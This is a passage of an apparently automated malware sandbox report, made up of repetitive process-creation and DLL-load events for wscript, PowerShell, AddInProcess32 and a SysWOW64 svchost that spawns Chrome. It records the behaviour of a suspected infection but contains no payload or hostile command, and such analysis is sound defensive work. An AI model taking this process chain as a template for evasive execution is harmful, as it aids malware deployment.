            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1728 --field-trial-handle=1980,i,7225582587041739135,14714490613506234970,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2012,i,8574600569835257597,12503451850514221727,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1648 --field-trial-handle=1996,i,18342384901192943427,3001916881733487027,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2056 --field-trial-handle=2008,i,13349874762832594225,9819071068630656309,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
            Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
            Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textshaping.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dll
